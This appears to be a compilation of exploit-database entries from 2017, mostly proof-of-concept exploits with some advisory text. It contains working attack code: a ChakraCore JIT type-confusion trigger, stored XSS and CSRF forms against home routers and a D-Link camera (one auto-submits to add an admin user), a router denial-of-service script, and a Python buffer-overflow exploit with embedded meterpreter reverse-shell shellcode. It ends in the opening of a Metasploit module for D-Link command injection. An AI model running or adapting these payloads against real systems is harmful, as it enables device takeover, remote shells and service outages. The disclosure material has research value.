MultiBr ..., s53(s28).i32! #0070
MultiBr instructions' offset operand(s28 in the above) must be of type Int32. If not, type confusion will occur. The way to ensure it is to use BailOutExpectingInteger.
In the above code, "s26" is ensured to be of type Int32 by the bailout. So, the other variables affected by "s26" including the offset variable "s28" are also ensured to be of type Int32.
What I noticed is "s28.var = Sub_A s26.var, 2 (0x2).i32". If we declare a variable "j" with "i - 2", the offset variable "s28" will be replaced with "j" in the CSE phase.
JS:
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
}
IR:
Line 3: let j = i - 2;
Col 9: ^
StatementBoundary #2 #0013
s55(s28).i32 = Sub_I4 s54(s24).i32, 2 (0x2).i32 #0013
Line 4: switch (i) {
Col 9: ^
StatementBoundary #3 #001a // BailOutExpectingInteger
BrLt_I4 $L2, s54(s24).i32, 2 (0x2).i32 #0079
BrGt_I4 $L2, s54(s24).i32, 38 (0x26).i32 #0079
MultiBr ..., s55(s28).i32! #0079
The offset variable is replaced with "j" that is not ensured to be of type Int32.
CORRECTION: The bug was that it tried to ensure the type using BailOutExpectingInteger, even if "i" was not always of type Int32. It was bypassed with the CSE phase. So if we created a case where "j" couldn't be of type Int32, type confusion occurred.
JS:
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
if (i == 39)
i = 'aaaa';
}
IR:
Line 3: let j = i - 2;
Col 9: ^
StatementBoundary #2 #0013
s30[LikelyCanBeTaggedValue_Int].var = Sub_A s26[LikelyCanBeTaggedValue_Int_Number].var, 0x1000000000002.var #0013
s27[LikelyCanBeTaggedValue_Int].var = Ld_A s30[isTempLastUse][LikelyCanBeTaggedValue_Int].var! #0017
Line 4: switch (i) {
Col 9: ^
StatementBoundary #3 #001a
s63(s26).i32 = FromVar s26[LikelyCanBeTaggedValue_Int_Number].var #001a Bailout: #001a (BailOutExpectingInteger)
BrLt_I4 $L4, s63(s26).i32, 2 (0x2).i32 #0079
BrGt_I4 $L4, s63(s26).i32, 38 (0x26).i32 #0079
MultiBr ..., s27[LikelyCanBeTaggedValue_Int].var #0079
It ended up to use "j" of type Var as the offset variable.
PoC:
*/
// JIT target for the switch/CSE issue explained in the comment above.
// `j = i - 2` matches the jump-table offset expression, so the CSE phase reuses
// `j` as the MultiBr offset; assigning a string to `i` late in the loop means
// `j` is not guaranteed to be Int32, and the jump table is then indexed with a
// Var. The exact statement shape matters for the trigger; do not restructure.
function opt() {
for (let i = 0; i < 100; i++) {
// Same expression as the switch's internal offset (minimum case is 2).
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
// Makes `i` a non-integer once; the comparison i < 100 then fails and the loop ends.
if (i == 90) {
i = 'x';
}
}
}
// Driver: calls opt() 100 times (presumably enough for it to be JIT-compiled);
// the crash log in the comment below shows the resulting fault.
function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}
main();
/*
Crash Log:
RAX: 0x1
RBX: 0x7ffff7e04824 --> 0x100000000
RCX: 0x3
RDX: 0x7ffff0b20667 (loope 0x7ffff0b2066d)
RSI: 0x80000001
RDI: 0x7ffff0c182a0 --> 0x7ffff6478a10 --> 0x7ffff5986230 (<Js::DynamicObject::Finalize(bool)>: push rbp)
RBP: 0x7fffffff2130 --> 0x7fffffff21b0 --> 0x7fffffff2400 --> 0x7fffffff2480 --> 0x7fffffff24d0 --> 0x7fffffff52f0 (--> ...)
RSP: 0x7fffffff20c0 --> 0x1111015500000002
RIP: 0x7ffff0b204da (mov rdx,QWORD PTR [rdx+r13*8])
R8 : 0x0
R9 : 0x0
R10: 0x7ffff0b20400 (movabs rax,0x555555879018)
R11: 0x206
R12: 0x7fffffff5580 --> 0x7ffff0ba0000 --> 0xeb021a471b4f1a4f
R13: 0x1000000000001 << Var 1
R14: 0x1000000000003
R15: 0x7ffff0c79040 --> 0x7ffff643c050 --> 0x7ffff5521130 (<Js::RecyclableObject::Finalize(bool)>: push rbp)
EFLAGS: 0x10297 (CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff0b204cb: cmp ecx,0x26
0x7ffff0b204ce: jg 0x7ffff0b204e1
0x7ffff0b204d0: movabs rdx,0x7ffff0b20667
=> 0x7ffff0b204da: mov rdx,QWORD PTR [rdx+r13*8]
0x7ffff0b204de: rex.W jmp rdx
We can simply think as follows.
Before the CSE phase:
Var j = ToVar(i - 2);
int32_t offset = i - 2;
jmp jump_table[offset];
After the CSE phase:
Var j = ToVar(i - 2);
jmp jump_table[j];
*/
# Exploit Title: Vonage Home Router – Stored Xss
# Date: 16/11/2017
# Exploit Author: Nu11By73
# Hardware Version: VDV-23: 115
# Software Version: 3.2.11-0.9.40
# CVE : CVE-2017-16843
NewKeyword Parameter:
1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the block these keywords text box enter: test”><script>alert(1)</script>
5. Click the add keyword button to receive the pop up.
NewDomain Parameter:
1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the block these websites text box enter: test”><script>alert(1)</script>
5. Click the add domain button to receive the pop up.
Proof of concept code:
NewDomain.html
<!—Note: The x and y values will need to be changed accordingly
<html>
<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" / >
<input type="hidden" name="NewKeyword" value="" / >
<input type="hidden" name="KeywordAction" value="0" />
<input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" />
<input type="hidden" name="x" value="50" />
<input type="hidden" name="y" value="15" />
<input type="hidden" name="DomainAction" value="1" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Exploit" />
</form>
</html>
NewKeyword.html
<!—Note: The x and y values will need to be changed accordingly
<html>
<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" / >
<input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" / >
<input type="hidden" name="x" value="61" />
<input type="hidden" name="y" value="12" />
<input type="hidden" name="KeywordAction" value="1" />
<input type="hidden" name="NewDomain" value="" />
<input type="hidden" name="DomainAction" value="0" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Enable Service" />
</form>
</html>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1339
I accidentally found this while trying to reproduce another bug in Edge.
Failed to reproduce on Microsoft Edge 38.14393.1066.0, Microsoft EdgeHTML 14.14393.
Tested on Microsoft Edge 40.15063.0.0, Microsoft EdgeHTML 15.15063 (Insider Preview).
Crash Log:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::FindEntry<Js::DynamicType>+0x41:
00007fff`e2b7c841 8b0c81 mov ecx,dword ptr [rcx+rax*4] ds:0000023b`4a2ea4c4=????????
0:015> k
# Child-SP RetAddr Call Site
00 000000be`563fbba0 00007fff`e2f52e3e chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::FindEntry<Js::DynamicType>+0x41
01 000000be`563fbbf0 00007fff`e2e1f9a4 chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::TryGetValue+0x56
02 000000be`563fbc40 00007fff`e2cb58a9 chakra!Windows::Data::Text::IUnicodeCharactersStatics::`vcall'{144}'+0x58fc4
03 000000be`563fbcf0 00007fff`e2db04c8 chakra!Js::JavascriptObject::ChangePrototype+0x109
04 000000be`563fbd30 00007fff`e2dbe863 chakra!Js::JavascriptObject::EntrySetPrototypeOf+0xc8
05 000000be`563fbd80 00007fff`e2c5dfb8 chakra!amd64_CallFunction+0x93
06 000000be`563fbde0 00007fff`e2c610da chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x158
07 000000be`563fbe80 00007fff`e2c67c61 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xaa
08 000000be`563fbf00 00007fff`e2c6436c chakra!Js::InterpreterStackFrame::ProcessProfiled+0x131
09 000000be`563fbf60 00007fff`e2dc1bfd chakra!Js::InterpreterStackFrame::Process+0x12c
0a 000000be`563fbfc0 00007fff`e2d88cd5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x3bd
0b 000000be`563fc310 0000023a`3c412fc2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0c 000000be`563fc360 00007fff`e2dbe863 0x0000023a`3c412fc2
0d 000000be`563fc390 00007fff`e2ca6113 chakra!amd64_CallFunction+0x93
0e 000000be`563fc3e0 00007fff`e2c52060 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0f 000000be`563fc440 00007fff`e2c51167 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
10 000000be`563fc530 00007fff`e2d9ec52 chakra!Js::JavascriptFunction::CallRootFunction+0x4b
11 000000be`563fc5a0 00007fff`e2c50fa4 chakra!ScriptSite::CallRootFunction+0x6a
12 000000be`563fc600 00007fff`e2d30c99 chakra!ScriptSite::Execute+0x124
13 000000be`563fc690 00007fff`e2d31fde chakra!ScriptEngine::ExecutePendingScripts+0x1a5
14 000000be`563fc760 00007fff`e2d32271 chakra!ScriptEngine::ParseScriptTextCore+0x436
15 000000be`563fc8b0 00007fff`da0fe8d5 chakra!ScriptEngine::ParseScriptText+0xb1
16 000000be`563fc960 00007fff`da0fe71e edgehtml!CJScript9Holder::ParseScriptText+0x119
17 000000be`563fca00 00007fff`da0fe237 edgehtml!CScriptCollection::ParseScriptText+0x202
18 000000be`563fcae0 00007fff`da0fdb67 edgehtml!CScriptData::CommitCode+0x357
19 000000be`563fcca0 00007fff`da2c50ad edgehtml!CScriptData::Execute+0x20f
1a 000000be`563fcd50 00007fff`da136ad4 edgehtml!CHtmScriptParseCtx::Execute+0x7d
1b 000000be`563fcd80 00007fff`da135ba1 edgehtml!CHtmParseBase::Execute+0x204
1c 000000be`563fce10 00007fff`da2be8cb edgehtml!CHtmPost::Exec+0x1e1
1d 000000be`563fcff0 00007fff`da2be7af edgehtml!CHtmPost::Run+0x2f
1e 000000be`563fd020 00007fff`da2be663 edgehtml!PostManExecute+0x63
1f 000000be`563fd060 00007fff`da2be4fd edgehtml!PostManResume+0xa3
20 000000be`563fd0a0 00007fff`da2ccfb3 edgehtml!CHtmPost::OnDwnChanCallback+0x3d
21 000000be`563fd0f0 00007fff`da2a4ddb edgehtml!CDwnChan::OnMethodCall+0x23
22 000000be`563fd120 00007fff`da163f46 edgehtml!GWndAsyncTask::Run+0x1b
23 000000be`563fd150 00007fff`da280480 edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
24 000000be`563fd220 00007fff`da2802a3 edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
25 000000be`563fd270 00007fff`da164af3 edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
26 000000be`563fd2d0 00007fff`da162fe5 edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
27 000000be`563fd300 00007fff`fb3dbc50 edgehtml!GlobalWndProc+0x125
PoC:
-->
<script>
// Crash reproducer from the report above. At script top level `this` is the global object,
// so this call asks the engine to make the global object the prototype of a fresh object.
// Per the stack trace, Object.setPrototypeOf reaches Js::JavascriptObject::ChangePrototype and
// the faulting read happens in WeaklyReferencedKeyDictionary<Js::DynamicType,...>::FindEntry.
Object.setPrototypeOf({}, this);
// Reloads the document, so the same sequence runs again on every load.
location.reload();
</script>
# Exploit Title: XSS Vuln - TP-LINK TL-WR740N
# Date: 15/11/2017
# Exploit Author: bl00dy
# Vendor Homepage: http://www.tp-link.com <http://www.tp-link.com.br/>
# Version: TP-LINK TL-WR740N - 3.17.0 Build 140520 Rel.75075n
# Tested on: Windows 8.1
Stored cross-site scripting (XSS) in TP-LINK TL-WR740N: the Description field of a Wireless MAC Filtering entry is rendered without escaping
______________________________________________________
Proof of Concept:
1. Go to your wireless router ip (ex. 192.168.0.1)
2. Go to Wireless and -Wireless MAC Filtering- tab
3. Click Add new button
5.Write random MAC Address and in -Description- write (<h1>XSS by
bl00dy</h1>)
6.Click save and you will see XSS in Wireless MAC Filtering tab
______________________________________________________
# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
# Reproducer for CVE-2017-9675: sends one unauthenticated HTTP GET for a directory path.
# Per the description above, firmware 2.08UI and prior reboots when handling such a request.
ROUTER=$1
# Require exactly one argument. The bare `exit` returns the status of the preceding echo,
# so the usage path normally reports success (0) to the caller.
if [ "$#" -ne 1 ]; then
echo "usage: $0 <router_ip>"
exit
fi
# NOTE(review): $ROUTER is unquoted, so the argument is subject to word splitting and globbing.
# This reproducer requests /Tools/; the description attributes the bug to the handling of
# directory-path GETs in general, so a network filter should not key on this one path alone.
curl http://$ROUTER/Tools/
# Exploit Title: [D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability]
# Date: [26/03/2017]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [http://us.dlink.com/product-category/home-solutions/view/network-cameras/]
# Version: [Tested on DCS-936L with firmware version 1.03. Other versions/models are also affected]
# Tested on: [DCS-936L with firmware version 1.02.01]
# CVE : [CVE-2017-7851]
==================
#Product:-
==================
Small and unobtrusive, SecuriCam™ IP surveillance solutions from D-Link allow you to monitor your offices or warehouses from anywhere - at anytime. Extreme Low LUX optics, 2 way audio, and full pan/tilt/zoom manipulation provide everything an SMB needs to safeguard their valuable resources.
==================
#Vulnerability:-
==================
D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability.
========================
#Vulnerability Details:-
========================
=============================================================================================================================
D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability (CVE-2017-7851)
=============================================================================================================================
D-Link DCS-936L devices with firmware 1.02.01 have CSRF. If a victim is logged into the camera's web console and visits a malicious site hosting a <Target_Device_IP.HTML> from another tab in the same browser, the malicious site can send requests to the victim's device. An attacker can add a new user, replace the firmware image with a malicious one, or connect the victim's device to a rogue Wireless Network.
An attacker can easily find out public IP address of victim's device on Shodan or similar search engines to create <Target_Device_IP.HTML> file. Victim must be logged into the camera's web console and visit attacker's site from another tab in the same browser.
#Proof-of-Concept:-
-------------------
D-Link DCS-936L prevents CSRF attack by looking at ‘Referer’ header. The ‘Referer’ IP should match with the one in ‘HOST’ header. If it does not, HTTP 403 is returned in the response. However, this device does not perform a strict check on ‘Referer’ header. It seems that it looks for the device’s IP address (which is the one in ‘HOST’ header) anywhere in the ‘Referer’ header. If found, it happily accepts the request.
An unauthenticated, remote attacker could host a malicious site that makes requests to the victim’s device without having credentials. In a targeted attack, an attacker needs to trick victim to visit a malicious site that exploits this vulnerability.
1. Attacker hosts a ‘<target_ip>.html’ on <attacking_ip>
<html>
<!-- Advisory PoC: a cross-site form that submits itself on load to the camera's
     tools_admin.cgi with action=set and a user/password pair.
     It is accepted because the page is served as '<target_ip>.html', so the Referer
     (http://<attacking_ip>/<target_ip>.html) contains the device IP as a substring.
     An exact comparison of the Referer/Origin host against the Host header, or a
     per-session anti-CSRF token, would cause this request to be rejected. -->
<body>
<form id="CSRF" action="http://<target_ip>/eng/admin/tools_admin.cgi" method="POST">
<input type="hidden" name="user" value="hacker">
<input type="hidden" name="action" value="set">
<input type="hidden" name="password" value="abc123">
<input type="hidden" name="confirmPassword" value="abc123">
</form>
<script>
// Submits the hidden form as soon as the page loads; no user interaction is involved.
window.onload = function(){
document.forms['CSRF'].submit()
}
</script>
</body>
</html>
2. Victim logs into his device.
3. Victim then visits attackers site http://<attacking_ip>/<target_ip>.html
4. Above request adds a new user ‘Hacker’ which reboots the web server.
6. Browser sends add new user request to the target device <target_ip>. Victim's browser sets 'Referer' header to 'http://<attacking_ip>/<target_ip>.html'. As this contains the IP address of the device (<target_ip>), this request is processed successfully.
7. Server response shows user hacker added successfully:
8. Attacker can now log into the device as hacker/abc123
===================================
#Vulnerability Disclosure Timeline:
===================================
26/03/2017: First email to disclose vulnerability to D-Link incident response team.
26/03/2017: Vendor acknowledged the report.
25/05/2017: Vendor confirmed that development has been completed and it's undergoing security audit.
13/10/2017: Firmware released to production: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_FIRMWARE_v1.05.07.zip
13/11/2017: DCS-936L Firmware Release Notes: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_RELEASE_NOTES_v1.05.07.pdf
15/11/2017: Published CVE-2017-7851
LanSweeper - Cross Site Scripting and HTMLi
Title: Vulnerability in LanSweeper
Date: 16-11-2017
Status: Vendor contacted, patch available
Author: Miguel Mendez Z
Vendor Homepage: http://www.lansweeper.com
Version: 6.0.100.75
CVE: CVE-2017-16841
Vulnerability description -------------------------
LanSweeper 6.0.100.75 has XSS via the description parameter to "/Calendar/CalendarActions.aspx".
Take control of the browser using the xss shell or perform malware attacks on users.
Vulnerable variable:
--------------------
"http://victim.com/Calendar/CalendarActions.aspx?action=scheduleinfo&id=2&__VIEWSTATE=&title=Test+Lansweeper&description=XSS/HTMLI&type=1&startdate=13/10/2017&txtStart=19:30&enddate=13/10/2017&txtEnd=21:30&reminder=15&repeattype=1&amount=1&repeatby=0&monthday=1&monthweekday=1&monthweekdayday=1&ends=1&occurrences=15&repeatenddate=&agents={"14":{"id":14,"editAllowed":true}}&teams=&delete=false"
"http://victim.com/Scanning/report.aspx?det=web50accessdeniederrors&title=XSS/HTMLI"
"http://victim.com/Software/report.aspx?det=XSS/HTMLI&title=Linux Software"
Poc:
----
https://www.youtube.com/watch?v=u213EqTSsXQ
# Tested on Windows 10 (x86)
# The application requires to have the web server enabled.
# Exploit for older version: https://www.exploit-db.com/exploits/40832/
#!/usr/bin/python
import socket,os,time,struct,argparse
# Target selection: --host is mandatory; the port is fixed at 80 (HTTP).
parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()
host = args.host
port = 80
# root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.116.166 LPORT=4455 -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
shellcode = ""
shellcode += "\xba\xb6\x9f\x39\x88\xd9\xf7\xd9\x74\x24\xf4\x5e\x31"
shellcode += "\xc9\xb1\x54\x83\xee\xfc\x31\x56\x0f\x03\x56\xb9\x7d"
shellcode += "\xcc\x74\x2d\x03\x2f\x85\xad\x64\xb9\x60\x9c\xa4\xdd"
shellcode += "\xe1\x8e\x14\x95\xa4\x22\xde\xfb\x5c\xb1\x92\xd3\x53"
shellcode += "\x72\x18\x02\x5d\x83\x31\x76\xfc\x07\x48\xab\xde\x36"
shellcode += "\x83\xbe\x1f\x7f\xfe\x33\x4d\x28\x74\xe1\x62\x5d\xc0"
shellcode += "\x3a\x08\x2d\xc4\x3a\xed\xe5\xe7\x6b\xa0\x7e\xbe\xab"
shellcode += "\x42\x53\xca\xe5\x5c\xb0\xf7\xbc\xd7\x02\x83\x3e\x3e"
shellcode += "\x5b\x6c\xec\x7f\x54\x9f\xec\xb8\x52\x40\x9b\xb0\xa1"
shellcode += "\xfd\x9c\x06\xd8\xd9\x29\x9d\x7a\xa9\x8a\x79\x7b\x7e"
shellcode += "\x4c\x09\x77\xcb\x1a\x55\x9b\xca\xcf\xed\xa7\x47\xee"
shellcode += "\x21\x2e\x13\xd5\xe5\x6b\xc7\x74\xbf\xd1\xa6\x89\xdf"
shellcode += "\xba\x17\x2c\xab\x56\x43\x5d\xf6\x3e\xa0\x6c\x09\xbe"
shellcode += "\xae\xe7\x7a\x8c\x71\x5c\x15\xbc\xfa\x7a\xe2\xc3\xd0"
shellcode += "\x3b\x7c\x3a\xdb\x3b\x54\xf8\x8f\x6b\xce\x29\xb0\xe7"
shellcode += "\x0e\xd6\x65\x9d\x04\x40\x2a\x72\x6d\x36\x5a\x71\x8d"
shellcode += "\x27\xfc\xfc\x6b\x17\x52\xaf\x23\xd7\x02\x0f\x94\xbf"
shellcode += "\x48\x80\xcb\xdf\x72\x4a\x64\x75\x9d\x23\xdc\xe1\x04"
shellcode += "\x6e\x96\x90\xc9\xa4\xd2\x92\x42\x4d\x22\x5c\xa3\x24"
shellcode += "\x30\x88\xd2\xc6\xc8\x48\x7f\xc7\xa2\x4c\x29\x90\x5a"
shellcode += "\x4e\x0c\xd6\xc4\xb1\x7b\x64\x02\x4d\xfa\x5d\x78\x7b"
shellcode += "\x68\xe2\x16\x83\x7c\xe2\xe6\xd5\x16\xe2\x8e\x81\x42"
shellcode += "\xb1\xab\xce\x5e\xa5\x67\x5a\x61\x9c\xd4\xcd\x09\x22"
shellcode += "\x02\x39\x96\xdd\x61\x3a\xd1\x22\xf7\x1e\x7a\x4b\x07"
shellcode += "\x1e\x7a\x8b\x6d\x9e\x2a\xe3\x7a\xb1\xc5\xc3\x83\x18"
shellcode += "\x8e\x4b\x09\xcc\x7c\xed\x0e\xc5\x21\xb3\x0f\xe9\xf9"
shellcode += "\xa2\x81\x0e\xfe\xca\x63\x33\x28\xf3\x11\x74\xe8\x40"
shellcode += "\x29\xcf\x4d\xe0\xa0\x2f\xc1\xf2\xe0"
# Overflow string (Python 2 byte string): 780 filler bytes, then a 4-byte little-endian
# value that lands on the saved return address, then a NOP pad and the shellcode.
buffer = "\x41" * 780
# Hard-coded address annotated by the author as a JMP ESP inside "libspp".
# NOTE(review): a fixed address presumably relies on that module loading at a
# constant base, i.e. without ASLR; confirm against the target build.
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "\x90" * 12
buffer += shellcode
# Pad the field to exactly 10000 bytes.
buffer += "\x90" * (10000 - len(buffer))
# Raw HTTP request. The same 10000-byte string is sent in both the username and the
# password form fields of POST /login; oversized values in those two fields are the
# observable trait of this request in web-server or proxy logs.
evil = "POST /login HTTP/1.1\r\n"
# NOTE(review): the Host header is hard-coded and independent of --host.
evil += "Host: 192.168.228.140\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
# NOTE(review): the declared Content-Length (17000) is smaller than the body that is
# actually sent (two 10000-byte fields plus the parameter names).
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=" + buffer
evil += "&password=" + buffer + "\r\n"
# Plain TCP socket; the request is written once and no response is read.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
X41 D-Sec GmbH Security Advisory: X41-2017-006
Multiple Vulnerabilities in PSFTPd Windows FTP Server
=====================================================
Overview
--------
Confirmed Affected Versions: 10.0.4 Build 729
Confirmed Patched Versions: None
Vendor: Sergei Pleis Softwareentwicklung
Vendor URL: http://www.psftp.de/ftp-server/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-006-psftpd/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to hide
information in log files, recover passwords and crash the whole server.
The server uses neither ASLR nor DEP, so neither mitigation is present to make exploitation harder.
Product Description
-------------------
From the vendor page, roughly translated:
PSFTPd is a userfriendly, functional and robust FTP server software with
support for FTP, FTPS and SFTP.
Use after free
==============
Severity Rating: High
Vector: Network
CVE: CVE-2017-15271
CWE: 416
CVSS Score: 7.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary and Impact
------------------
An invalid memory access issue could be triggered remotely in the SFTP
component of PSFTPd. This issue could be triggered prior to authentication.
The PSFTPd server did not automatically restart, which enabled attackers
to perform a very effective DoS attack against this service. By sending
the following SSH identification / version string to the server, a NULL
pointer dereference could be triggered:
$ cat tmp.14
SSH-2.0-BBBBBBBB
CCCCCCCCCCCC
$ cat tmp.14 | socat - TCP:192.168.122.50:22
The issue appears to be a race condition in the window message handling,
performing the cleanup for invalid connections. Upon further
investigation X41 D-Sec GmbH could confirm that the accessed memory was
already freed.
X41 D-Sec GmbH enabled the page heap memory-debugging feature for
the psftpd_svc.exe executable using the command "agflags.exe /p /disable
psftpd_svc.exe /fulla" (reproduced as printed; the Windows tool is
gflags.exe, and full page heap is enabled with "gflags.exe /p /enable
psftpd_svc.exe /full"). When observing the crash in the WinDBG 19
debugging tool, it could be confirmed that access to an already freed
page was taking place.
Log Injection
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15270
CWE: 117
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Summary and Impact
------------------
The PSFTPd server does not properly escape data before writing it into a
Comma Separated Values (CSV) file. This can be used by attackers to hide
data in the Graphical User Interface (GUI) view and create arbitrary
entries to a certain extent.
Special characters such as '"', ',' and '\r' are not escaped and can be used
to add new entries to the log.
Workarounds
-----------
None
Passwords stored in Plain Text
==============================
Severity Rating: Low
Vector: Local
CVE: CVE-2017-15272
CWE: 312
CVSS Score: 3.3
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The PSFTPd server stores its configuration inside the PSFTPd.dat. This
file is a Microsoft Access Database and can be extracted by using the
command "mdb-export PSFTPd.dat USERS" from mdbtools
(https://github.com/brianb/mdbtools). The application sets the encrypt
flag with the password "ITsILLEGAL", but this is not required to extract
the data.
The users' passwords are shown in clear text, since they are not stored securely.
Workarounds
-----------
Use the Active Directory connector for your users.
FTP Bounce Scan
===============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15269
CWE: 441
CVSS Score: 5.0
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Summary and Impact
------------------
The PSFTPd server does not prevent FTP bounce scans by default.
These can be performed using "nmap -b" and allow to perform scans via
the FTP server.
Workarounds
-----------
It is possible to prevent FTP bounce scans by setting: Kontrollmanager >
Domain > Sicherheit > Register "FTP Bounce and FXP"
Workarounds
-----------
None
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-08-31 Issues found
2017-09-18 Vendor contacted
2017-09-19 Vendor reply
2017-10-11 CVE IDs requested
2017-10-11 CVE IDs assigned
2017-11-06 Vendor informed us, that apparently a fixed version was
released. We cannot confirm, since we do not have
access.
2017-11-07 Public release
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
# Metasploit module for the D-Link DIR-850L. As written, it chains three steps:
#   1. retrieve_creds  - unauthenticated read of DEVICE.ACCOUNT.xml through /hedwig.cgi
#   2. login           - challenge/response login against /authentication.cgi
#   3. execute_command - shell metacharacters placed in the NTP <server> setting,
#                        saved via /hedwig.cgi and applied via /pigwidgeon.cgi
# The request paths and bodies below are also what shows up in HTTP logs or packet
# captures when this module has been run against a device.
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
